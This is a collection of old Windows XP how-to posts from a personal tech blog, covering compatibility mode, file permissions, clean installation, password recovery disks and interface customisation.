    If you're having trouble running older programs originally developed for previous versions of Windows, you're not out of luck. Luckily for consumers, Microsoft built Compatibility Mode into XP. Compatibility Mode allows you to run a program using the shell of the original program it was developed for.

    Here's how to access a program's Compatibility Mode in XP:


    Find the executable or program shortcut icon you'd like to run.
    Right-click the icon and select Properties.
    Click the Compatibility tab and place a checkmark next to the text labeled "Run this program in compatibility mode."
    Select the operating system that the program was originally intended to run on.
    You may need to fine-tune the three fields under "Display Settings" if an older program requires 640x480 resolution or 256 colors.
    Click Apply.

    Try starting the program after making these changes. If it still gives you trouble, try a different operating system. If the program was written for Win95 and worked fine in Win98, there's nothing that says it still won't work fine with Win98.
    continue reading "Compatibility Mode Make older programs run in Windows XP"

    XP File Sharing and Permissions

    Buzz It
    submit to reddit StumbleUpon
    XP File Sharing and Permissions

    File sharing and permissions in Windows XP seem complicated.


    Microsoft provides a Knowledge Base article, but reading it is like walking through molasses: It describes in infinite detail a file security system based on a 1-to-5 scale. However, if you look for this 1-to-5 scale anywhere in your security-settings interface, you may come away a little confused. These numbers are nowhere to be found.


    Microsoft's 1-to-5 scale means nothing to the individual user and relates in no way to the actual practice of setting your security protocols. Enter the Screen Savers. We are here to explain it to you.


    The security settings the user actually sets relate to read access, write access, shared folders, and password protection. These features are available in both Windows XP Home Edition and Windows XP Professional, however the features only work if the operating system is installed with NTFS. FAT32 does not support the file permissions described here.


    You can choose to install Windows XP Home using NTFS, but you should use a FAT32 file system if you are dual booting and want to see the contents of your Windows 95, 98, or Me partition from your XP partition. Your file system is not set in stone when you install Windows XP. You always can change your file system from FAT32 to NTFS without losing any of your data; however, the transition is one-way only.


    There is no going back to FAT32 from NTFS unless you grab a copy of Partition Magic. Microsoft recommends you install Windows XP Home with FAT32 if you intend to install more than one OS on your computer or if your hard drive is less than 32GB.


    If you have Windows XP Home or Professional running NTFS, you can hide files and entire folders from prying eyes. When you set up multiple user accounts on one machine, any user with administrator access can view the documents in another's My Documents folders. To protect a folder, right-click it, choose Properties, the Share tab, and select "make this folder private." No one, not even a fellow system administrator, can access these most secret files.


    Every file or folder contained within whichever folder you choose to make private will take on the settings of the parent folder. If the administrator does not have a password to the account, Windows XP will prompt the user to make a password or risk subjecting his or her private work to public scrutiny. No Windows password means no protected files.


    A person who logs in as a guest or as a user without administrator privileges cannot see the contents of any other user's My Documents folder, even if the folder has not been explicitly made private. The user with limited privileges can, however, set a password and protect his or her documents from the prying eyes of the administrators. Windows XP is all about privacy.


    It is a nice feeling to keep your personal tax documents secure from the passing lookey-loo. It's about time Microsoft made snooping your computer more difficult than snooping your medicine cabinet.



    continue reading "XP File Sharing and Permissions"

    Install Windows XP Professional - New Installation

    Buzz It
    submit to reddit StumbleUpon
    Install Windows XP Professional - New Installation

    There are three reasons why you may need to install a new copy of Windows XP:

    • Your current operating system doesn’t support an upgrade to Windows XP Professional.
       
    • Your current operating system supports an upgrade to Windows XP Professional, but you don’t want to keep your existing files and personalized settings.
       
    • Your computer does not have an operating system.
    The setup process is similar for new installations and upgrades with a few notable exceptions. For example, during a new installation, you are able to configure Special Options, convert your file system, and create a new partition for the Windows XP installation.
    IMPORTANT
    A new installation deletes all programs or system files from a previous installation.


    Special Options

    Under Special Options, you have the choice to change Language, Advanced, and Accessibility settings during the setup process.
    Note:  If you are in a country that has recently adopted the euro as its currency, you may have to modify the currency settings to display monetary amounts correctly.
    For more information, go to Help and Support Center and type “euro” in the Search box.
    Select If you want to...
    Language
  • Choose the primary language and regions for Windows XP, which affects the default settings for date, time, currency, numbers, character sets, and keyboard layout.

  • Choose additional language groups and character sets to use with the programs you are running on Windows XP.

  • Advanced Options
  • Change the default location of the Setup files.

  • Store system files in a folder other than the default (Windows) folder

  • Copy the installation files from the CD to the hard disk.

  • Accessibility
  • Use Narrator or Magnifier during Setup.



  • IMPORTANT
    Unless you're an advanced user, it's recommended that you use the default settings.


    Choosing a File System

    During a new installation of Windows XP, you may have to choose which file system your computer should use. Windows XP Professional supports:
    • FAT32: An enhanced version of the file allocation table (FAT) system that is standard on all Windows operating systems starting with later (32-bit) versions of Windows 95. The FAT32 system can be used on large hard disks, from 512 megabytes (MB) to 32 gigabytes (GB).
    • NTFS: The NT file system (NTFS) is used with the Windows NT, Windows 2000, and Windows XP operating systems. NTFS provides enhanced reliability, stability, and security, and supports large hard disks of up to 2 terabytes (TB).
    IMPORTANT
    You can convert your file system any time, even after you install Windows XP, without losing any of your data.

    The conversion to NTFS is one–way only; if you convert your FAT or FAT32 file system to NTFS you can’t convert your hard disk back to FAT later.

    If you’re not sure which file system to use, keep the one your computer defaults to during Setup. If you want to change your file system, here are a few recommendations:
    • Use FAT32 if your hard disk is smaller than 32 GB.
    • Use FAT32 if you want to install more than one operating system on your computer.
    • Use NTFS if your hard drive is larger than 32 GB and you are running only one operating system on your computer.
    • Use NTFS if you want enhanced file security.
    • Use NTFS if you need better disk compression.

    Disk Partitions

    You can create partitions to organize information—for example, to back up data—or to install more than one operating system on your computer. A hard disk can contain up to four partitions.
    If you’re performing a new installation, the appropriate disk partition is selected automatically during Windows XP Setup unless you click Advanced Options and specify your own requirements
    For more information about configuring, sizing, reformatting, or converting disk partitions, see your current online Help before you install or upgrade to Windows XP Professional.


    continue reading "Install Windows XP Professional - New Installation"

    Windows XP Step-by-Step Installation Instructions

    Buzz It
    submit to reddit StumbleUpon
    Windows XP Step-by-Step Installation Instructions
    These steps are for a clean install of XP. Read this article for steps on upgrading your current system to XP.
    First, you're going to need to change your BIOS boot order to boot from CD-ROM. Once you do this you'll then be able to boot your computer from the Installation CD.
    After changing the boot order in BIOS, save the changes, and then reboot your computer. Make sure your Installation CD is in your CD-ROM. If it is you'll be prompted to press your space bar to directly boot from CD-ROM emulation. Press your space bar as soon as you see this message.
    Wait a few minutes while the installation begins to copy the preliminary setup files to your computer. After this completes you'll be ready to start directing the install process.
    You will be asked if you want to perform a new installation, repair an existing installation, or quit. In this case, you will be performing a new install. Press the correct key to perform a new installation.
    Read the terms of the end user license agreement, and press F8 to agree.
    The next phase of the installation is real similar to that of Windows 2000. So, if you're familiar with the Windows 2000 installation process this should be a cinch.
    Basically, you need to decide which partition of your hard drive you will install Windows XP on. You will have the opportunity to create and/or delete partitions or just allocate the available disk space to one partition. However, try to keep your partitions within reasonable size.

    We recommend using multiple partitions of 4-8GB, preferably on more than one hard drive. This will help you back up your data and optimize system performance later on down the road. Once you have figured out which partition XP will be installed on it's time to format it.

    Choose to format the partition to either FAT32 or NTFS (recommended for single OS install). You'll also see two additional choices to perform a quick format of each option. Stick with doing a full format of either option instead. After you've determined which option is right for you, press the correct key to format the partition.

    This would be a good time to take a break and come back in a few minutes. The setup program will automatically start copying files after the partition is formatted.
    From this point on, you're going to see each and every file name that's being copied over to your hard drive appear in the lower left corner. As the file names go from A to Z, the installation completion percentage will increase.


    Choose the region and language.

    Type in your name and organization.
    Enter your product license key.
    Name the computer, and enter an Admin password. Don't forget to write down your Administrator password. After the installation is complete it would be extremely wise to create a password restore disk in the event you forget your Administrator password someday.
    Enter the correct date and time.
    Choose your network settings. Leave on automatic if you use a dhcp server to assign IP addresses. If you have static IP address for broadband access, enter the settings that your ISP has provided you.
    Choose workgroup or domain name.
    Register this copy of Windows XP if you've installed all the current hardware on your machine. Otherwise, wait until you've finished installing any additional hardware so you don't have to activate your copy of XP again.
    Add users that will sign on to this computer.
    Log in, and update drivers.
    Driver install
    XP found drivers for all of the hardware in our test machines, with the exception of a wireless network adapter that was added. Update all drivers that had updates available for download.
    It takes about 30 minutes to perform this installation. After that, you will be a few personalized settings away from getting started on your XP-experience. With a little use, the GUI even starts to grow on you.
    continue reading "Windows XP Step-by-Step Installation Instructions"

    Windows XP and Symmetric Multiprocessing

    Buzz It
    submit to reddit StumbleUpon
    Windows XP and Symmetric Multiprocessing
    Symmetric multiprocessing (SMP) is a technology that allows a computer to use more than one processor. The most common configuration of an SMP computer is one that uses two processors. The two processors are used to complete your computing tasks faster than a single processor. (Two processors aren't necessarily twice as fast as a single processor, though.)
    In order for a computer to take advantage of a multiprocessor setup, the software must be written for use with an SMP system. If a program isn't written for SMP, it won't take advantage of SMP. Not every program is written for SMP; SMP applications, such as image-editing programs, video-editing suites, and databases, tend to be processor intensive.
    SMP in Windows XP
    Operating systems also need to be written for SMP in order to use multiple processors. In the Windows XP family, only XP Professional supports SMP; XP Home does not. If you're a consumer with a dual-processor PC at home, you have to buy XP Professional. Windows XP Advanced Server also supports SMP.

    In Microsoft's grand scheme, XP Professional is meant to replace Windows 2000, which supports SMP. In fact, XP Professional uses the same kernel as Windows 2000. XP Home is designed to replace Windows Me as the consumer OS, and Windows Me does not support SMP.
    The difference between XP Professional and XP Home is more than just $100 and SMP support. XP Professional has plenty of other features not found in XP Home; some you'll use, others you won't care about. Get more information on the differences by reading this article.

    continue reading "Windows XP and Symmetric Multiprocessing"

    Password Recovery Disk

    Buzz It
    submit to reddit StumbleUpon
    Password Recovery Disk



    Take preventive measures against losing user-level passwords.

    It doesn't matter if you never again remember a Windows user password. Thanks to XP's Forgotten Password Wizard, your conscience will be free and clear -- should your mind happen to accidentally misplace your user password.

    I highly suggest you create a password recovery disk the minute you create your user account. Why? In order to create a password recovery disk you're going to need your password. Write it down the minute you create your user account and then proceed to creating your very own password recovery disk.

    Here's how to launch the Forgotten Password Wizard:

    Single-click Start menu, Control Panel, and User Accounts.
    Click your user account name.
    Under Related Tasks on the left, click "Prevent forgotten password" to launch the wizard.

    Now that you've launched the wizard, let it walk you through creating the recovery disk. Make sure the disk you use is formatted and in the drive. After it's finished creating the disk, label it and stash it away for an emergency.

    If you happen to forget your password, all you need to do is click your user icon at the logon screen. Even though you don't have your password, go ahead and click the green arrow just like you would to finish logging on to your computer. This will launch a little yellow dialog box directing you to use your password recovery disk.


    continue reading "Password Recovery Disk"

    Custom User Icons

    Buzz It
    submit to reddit StumbleUpon
    Custom User Icons



    If you plan on getting a copy of XP, one of the first things you're going to do is set up a user account. Why not give your user account its very own picture? It's OK if you don't want to use a picture of your own because Windows comes with at least 20 beautiful pictures to choose from.

    Here's how you can customize your user account icon.

    Single-click the start menu and choose Control Panel.
    Single-click the User Accounts icon.
    Find the user account you'd like to change the icon for and click on it.
    Click the text that says "Change My Picture."
    You'll have the option to either pick one of the predefined icons or choose your own.
    If you like one of the predefined icons, just highlight the one you like and click the button labeled "Change Picture."
    If you'd like to use your own picture, just click the magnifying glass or the text labeled "Browse for more pictures." This will launch a dialog box directing you to navigate to where your new picture is stored. After you find it, just click Open to save your new changes.

    continue reading "Custom User Icons"

    Make XP display a custom screen saver using your very own pictures

    Buzz It
    submit to reddit StumbleUpon
    Make XP display a custom screen saver using your very own pictures
    It used to be darn near impossible to create a personal screen saver using your own photo collection. To do this, you had to track down a third-party application and sloppily piece together your pictures to create a screen saver.

    Well, the engineers at Microsoft must have realized they hated third-party applications and decided enough was enough. XP can take any pictures stored in your "My Pictures" folder and display them in random order as a screen saver.


    To make a personal screen saver in XP, follow these directions:

    Right-click an empty spot on your desktop and choose Properties.
    Click the Screen Saver tab inside the Display Properties dialog box.
    In the Screen Saver pull-down menu, choose "My Pictures Slideshow."
    Underneath the Screen Saver pull-down menu, adjust the time of inactivity before Windows will initiate your screen saver.
    Click Settings to make additional adjustments. You'll be able to adjust transition effects between pictures, how frequently they change, what size the pictures should be, and more.
    Click OK when you're done tweaking the settings adjustments.
    Press the Preview button to see what your screen saver looks like.
    If everything is to your liking, click Apply.

    continue reading "Make XP display a custom screen saver using your very own pictures"

    Volume Icon in Taskbar

    Buzz It
    submit to reddit StumbleUpon
    Volume Icon in Taskbar



    It's really handy to have access to the Volume Control panel in the event you quickly need to move the volume slider up or down. In its default state, XP ships with almost a clean slate for both the desktop and taskbar. So, if you'd like to place the volume control icon in the taskbar, you're going to need to make a little adjustment.


    To place the volume control icon in the taskbar, follow these steps:


    Single-click the Start menu.
    Single-click Control Panel.
    Single-click Sound, Speech, and Audio Devices.
    Single-click Sounds and Audio Devices to launch the Sound and Audio Devices properties.
    On the Volume tab, locate the text labeled "Device Volume" and place a check mark next to the text labeled "Place volume icon in the taskbar."
    Single-click Apply.


    You should now have the volume icon in the taskbar. Now all you need to do is double-click this icon to bring up your Volume Control panel.

    continue reading "Volume Icon in Taskbar"

    Classic Look Make XP look just like older versions of Windows

    Buzz It
    submit to reddit StumbleUpon
    Classic Look Make XP look just like older versions of Windows

    If you're like me, you probably have grown way too close to the familiar Windows interface. That's OK. I don't adjust well to change either.


    After installing XP you may notice the revamped interface looks nothing like the old one. I was completely thrown back when I tried using it for the first time, but I suspect that over time the new interface will begin to grow on you as it has with me.


    Therefore, to ease your transition to the new OS, make a simple adjustment to XP to give it that classic look.


    Here's how to do it:

    Right-click your Desktop and select Properties.
    On the Desktop Display properties, click the Appearance tab.
    Under the Windows and buttons pull-down menu, select Windows Classic.
    Click Apply to see your new look.
    Click OK to close the Desktop Display properties.

    continue reading "Classic Look Make XP look just like older versions of Windows"

    Add sound to almost every event in Windows

    Buzz It
    submit to reddit StumbleUpon
    Add sound to almost every event in Windows
    XP comes with a new set of sounds that will surely add pizzazz to the way you work in Windows. But there's one problem -- you need to actually turn on the Windows default sound scheme before you'll be able to hear them.

    To turn on the Windows XP default sound scheme, follow these directions:

    Single-click the Start menu.
    Single-click the Control Panel.
    Single-click the Sounds, Speech, and Audio Devices icon.
    Single-click the Sounds and Audio Devices icon or the text labeled "Change the sound scheme."
    Make sure you're on the Sound tab and locate the pull-down menu under Sound scheme.
    Select the Windows Default option and press Apply. Windows will ask you if you want to save the previous sound scheme. Since there wasn't a sound scheme already loaded, just choose No.

    If you look under the text labeled "Program events," you'll be able to sample your new sounds or customize them with your own. Read Customize Events Sounds if you'd like to learn how to do this yourself.
    continue reading "Add sound to almost every event in Windows"
    Next Next home

    RECENT COMMENTS

    Grab This Widget

    Random posts

     

    Powered by FeedBurner

    Subscribe to updates
    Blog-Watch - The Blog Directory
    Computers blogs
    googlef97e20b47bd40d74.html
    The Link Exchange - Your ultimate resource for link exchange!
    Technology Blogs - Blog Rankings
    Computers Blogs
    GoLedy.com
    Blog Directory
    Technology Blogs - Blog Rankings
    Blog Directory
    Blog Directory
    Listed in LS Blogs the Blog Directory and Blog Search Engine

    I'm in

    I'm in
    Reddit [Mithun Mohan]

    Follow me in twitter

    Follow me in twitter
    [Brilliant Computing]

    See me in Delicious

    See me in Delicious
    Mithun Mohan

    Find me in stumble upon

    Find me in stumble upon
    [Mithun Mohan]

    Lets become friends in digg

    Lets become friends in digg
    [Brilliant Computing]

    The Brilliant Computing community in Orkut

    VISITORS

       
    MyFreeCopyright.com Registered & Protected

    TERMS AND CONDITIONS

    Dear Visitors...
    This blog does not contain uploaded files on the server but only provides direct links to download files.Navigate the links provided at your own risk.If any problem occurs like broken link or something or virus then you can contact me via 'Contact Me' found on top of this blog so that I can change the link.Dont hesitate to comment.If Any request or suggestions plz contact me.
    DO THE HACKS POSTED HERE AT YOUR OWN RISK.
    Thankyou for visiting my blog............enjoy

    Protected by Copyscape Plagiarism Detector
    function rtclickcheck(keyp){ if (navigator.appName == "Netscape" && keyp.which == 3){ alert(message); return false; } if (navigator.appVersion.indexOf("MSIE") != -1 && event.button == 2) { alert(message); return false; } } document.onmousedown = rtclickcheck;

    Brilliant Computing Copyright © 2009 Brilliant Computing is Designed by Ipietoon Sponsored by Online Business Journal

    Creative Commons License
    Brilliant computing by Mithun is licensed under a Creative Commons Attribution-Noncommercial 2.5 India License.